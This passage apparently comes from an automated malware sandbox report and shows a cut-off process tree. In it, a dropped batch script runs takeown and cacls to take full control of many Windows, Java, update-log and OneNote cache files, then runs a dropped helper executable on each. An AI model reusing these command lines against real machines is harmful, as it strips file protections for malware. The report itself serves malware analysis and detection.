                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:9044
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:9144
                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6544
                                                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                        takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:7088
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "wabmig.exe" -nobanner
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:6228
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                          lrEU2Z2i.exe -accepteula "wabmig.exe" -nobanner
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:6264
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                        lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:6620
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:6280
                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                        cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4904
                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                          takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:6432
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6420
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                              lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:7100
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                            lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:6476
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:6848
                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                              cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6596
                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:6356
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7188
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "ImagingDevices.exe.mui" -nobanner
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:7196
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:8180
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\DDF.sys""
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:7180
                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    cacls "C:\DDF.sys" /E /G Admin:F /C
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6572
                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                      takeown /F "C:\DDF.sys"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6508
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "DDF.sys" -nobanner
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:7152
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                            lrEU2Z2i.exe -accepteula "DDF.sys" -nobanner
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:276
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:300
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5188
                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                            cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:8224
                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                              takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5264
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "classes.jsa" -nobanner
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6988
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "classes.jsa" -nobanner
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:7052
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:5436
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.2.etl""
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6836
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.2.etl" /E /G Admin:F /C
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:740
                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                      takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.2.etl"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:5404
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.2.etl" -nobanner
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:7388
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "MoUsoCoreWorker.174914cc-d6bd-4a7c-9465-3d6d8e66af8d.2.etl" -nobanner
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:5568
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:8700
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.c191e09c-7a0e-4550-a61b-ca86430eb3e0.1.etl""
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:7252
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                              cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.c191e09c-7a0e-4550-a61b-ca86430eb3e0.1.etl" /E /G Admin:F /C
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                              PID:4348
                                                                                                                                                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                              takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.c191e09c-7a0e-4550-a61b-ca86430eb3e0.1.etl"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:216
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "WuProvider.c191e09c-7a0e-4550-a61b-ca86430eb3e0.1.etl" -nobanner
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3368
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula "WuProvider.c191e09c-7a0e-4550-a61b-ca86430eb3e0.1.etl" -nobanner
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5232
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                  lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:5640
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:5380
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:6896
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                      takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:7968
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:7328
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:7316
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:7300
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                              cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:7784
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:6484
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "PhotoAcq.dll.mui" -nobanner
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:7444
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:6924
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:7324
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5136
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:7488
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000G.bin" -nobanner
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000000G.bin" -nobanner
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:4656
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:7008
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:7516
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:8576
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                      takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:7612
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000R.bin" -nobanner
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:6060
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "0000000R.bin" -nobanner
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:800
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:7668
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:6084
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4940
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:8560
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000015.bin" -nobanner
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:7728
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "00000015.bin" -nobanner
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:7752
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:7736
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:7760
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1740
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4340
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000006H.bin" -nobanner
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5984
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula "0000006H.bin" -nobanner
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:5944
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5924
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:6044
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:7096
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                      takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      PID:7940
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000075.bin" -nobanner
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:5912
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "00000075.bin" -nobanner
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:5876
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3780
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:8032
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:8096
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                PID:5980
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000083.bin" -nobanner
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:8104
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "00000083.bin" -nobanner
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:6740
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                    PID:5504
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                      cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                      PID:4456
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                      takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      PID:8152
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000009F.bin" -nobanner
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:8120
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
